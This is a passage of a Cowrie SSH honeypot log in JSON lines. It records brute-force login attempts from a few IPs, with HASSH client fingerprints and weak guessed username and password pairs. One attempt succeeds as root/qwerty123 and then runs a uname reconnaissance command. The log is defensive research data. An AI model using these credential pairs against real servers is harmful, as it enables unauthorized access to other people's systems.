{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47958,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e5e062f8a69","protocol":"ssh","message":"New connection: 212.227.125.160:47958 (1.2.3.4:22) [session: 0e5e062f8a69]","sensor":"my-vps","timestamp":"2025-08-31T02:31:12.490203Z"}
{"eventid":"cowrie.login.failed","username":"es","password":"12345","message":"login attempt [es/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:31:18.375212Z","src_ip":"212.227.235.229","session":"887303630815"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:31:19.772016Z","src_ip":"212.227.125.160","session":"0e5e062f8a69"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:31:19.772658Z","src_ip":"212.227.125.160","session":"0e5e062f8a69"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:20.378898Z","src_ip":"212.227.235.229","session":"887303630815"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41780,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6bceaeebd89","protocol":"ssh","message":"New connection: 41.226.27.251:41780 (1.2.3.4:22) [session: a6bceaeebd89]","sensor":"my-vps","timestamp":"2025-08-31T02:31:27.513360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:31:27.514045Z","src_ip":"41.226.27.251","session":"a6bceaeebd89"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:31:27.561971Z","src_ip":"41.226.27.251","session":"a6bceaeebd89"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:31:27.706420Z","src_ip":"41.226.27.251","session":"a6bceaeebd89"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:28.942262Z","src_ip":"41.226.27.251","session":"a6bceaeebd89"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-31T02:31:31.210119Z","src_ip":"212.227.125.160","session":"0e5e062f8a69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39404,"dst_ip":"1.2.3.4","dst_port":22,"session":"44fab5c8b100","protocol":"ssh","message":"New connection: 212.227.235.229:39404 (1.2.3.4:22) [session: 44fab5c8b100]","sensor":"my-vps","timestamp":"2025-08-31T02:31:31.404578Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40510,"dst_ip":"1.2.3.4","dst_port":22,"session":"53c8232a8866","protocol":"ssh","message":"New connection: 212.227.125.160:40510 (1.2.3.4:22) [session: 53c8232a8866]","sensor":"my-vps","timestamp":"2025-08-31T02:31:33.237124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:31:33.797637Z","src_ip":"212.227.125.160","session":"53c8232a8866"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:31:33.798462Z","src_ip":"212.227.125.160","session":"53c8232a8866"}
{"eventid":"cowrie.login.failed","username":"es","password":"12345","message":"login attempt [es/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:31:35.632416Z","src_ip":"212.227.125.160","session":"53c8232a8866"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:31:35.917782Z","src_ip":"212.227.235.229","session":"44fab5c8b100"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:31:35.918852Z","src_ip":"212.227.235.229","session":"44fab5c8b100"}
{"eventid":"cowrie.session.closed","duration":"23.6","message":"Connection lost after 23.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:36.112997Z","src_ip":"212.227.125.160","session":"0e5e062f8a69"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:37.045659Z","src_ip":"212.227.125.160","session":"53c8232a8866"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":35754,"dst_ip":"1.2.3.4","dst_port":22,"session":"a41db34386b5","protocol":"ssh","message":"New connection: 41.226.27.251:35754 (1.2.3.4:22) [session: a41db34386b5]","sensor":"my-vps","timestamp":"2025-08-31T02:31:47.628951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:31:47.630809Z","src_ip":"41.226.27.251","session":"a41db34386b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:31:47.672576Z","src_ip":"41.226.27.251","session":"a41db34386b5"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:31:47.843657Z","src_ip":"41.226.27.251","session":"a41db34386b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:31:47.946160Z","src_ip":"41.226.27.251","session":"a41db34386b5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:31:47.947010Z","src_ip":"41.226.27.251","session":"a41db34386b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:47.990893Z","src_ip":"41.226.27.251","session":"a41db34386b5"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:47.992117Z","src_ip":"41.226.27.251","session":"a41db34386b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41022,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e87e16ce03f","protocol":"ssh","message":"New connection: 212.227.125.160:41022 (1.2.3.4:22) [session: 6e87e16ce03f]","sensor":"my-vps","timestamp":"2025-08-31T02:31:48.949804Z"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-31T02:31:59.849641Z","src_ip":"212.227.235.229","session":"44fab5c8b100"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39746,"dst_ip":"1.2.3.4","dst_port":22,"session":"72df7b64a50e","protocol":"ssh","message":"New connection: 41.226.27.251:39746 (1.2.3.4:22) [session: 72df7b64a50e]","sensor":"my-vps","timestamp":"2025-08-31T02:32:07.711229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:32:07.745688Z","src_ip":"41.226.27.251","session":"72df7b64a50e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:32:07.754623Z","src_ip":"41.226.27.251","session":"72df7b64a50e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:32:07.864222Z","src_ip":"212.227.125.160","session":"6e87e16ce03f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:32:07.864960Z","src_ip":"212.227.125.160","session":"6e87e16ce03f"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-31T02:32:07.926834Z","src_ip":"41.226.27.251","session":"72df7b64a50e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:32:09.183763Z","src_ip":"41.226.27.251","session":"72df7b64a50e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59292,"dst_ip":"1.2.3.4","dst_port":22,"session":"79419568f172","protocol":"ssh","message":"New connection: 212.227.235.229:59292 (1.2.3.4:22) [session: 79419568f172]","sensor":"my-vps","timestamp":"2025-08-31T02:32:12.221932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:32:13.058781Z","src_ip":"212.227.235.229","session":"79419568f172"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:32:13.060122Z","src_ip":"212.227.235.229","session":"79419568f172"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55962,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa501b9adc54","protocol":"ssh","message":"New connection: 212.227.235.229:55962 (1.2.3.4:22) [session: fa501b9adc54]","sensor":"my-vps","timestamp":"2025-08-31T02:32:14.197624Z"}
{"eventid":"cowrie.login.failed","username":"es","password":"1234567","message":"login attempt [es/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:32:19.248789Z","src_ip":"212.227.235.229","session":"79419568f172"}
{"eventid":"cowrie.session.closed","duration":"48.4","message":"Connection lost after 48.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:32:19.807799Z","src_ip":"212.227.235.229","session":"44fab5c8b100"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:32:21.078035Z","src_ip":"212.227.235.229","session":"79419568f172"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:32:25.167537Z","src_ip":"116.198.230.226","session":"96e4b9e433cb"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54962,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ef13b7c9be5","protocol":"ssh","message":"New connection: 41.226.27.251:54962 (1.2.3.4:22) [session: 6ef13b7c9be5]","sensor":"my-vps","timestamp":"2025-08-31T02:32:28.413722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:32:28.416090Z","src_ip":"41.226.27.251","session":"6ef13b7c9be5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:32:28.464831Z","src_ip":"41.226.27.251","session":"6ef13b7c9be5"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:32:28.655974Z","src_ip":"41.226.27.251","session":"6ef13b7c9be5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:32:29.982476Z","src_ip":"41.226.27.251","session":"6ef13b7c9be5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:32:30.927644Z","src_ip":"212.227.235.229","session":"fa501b9adc54"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed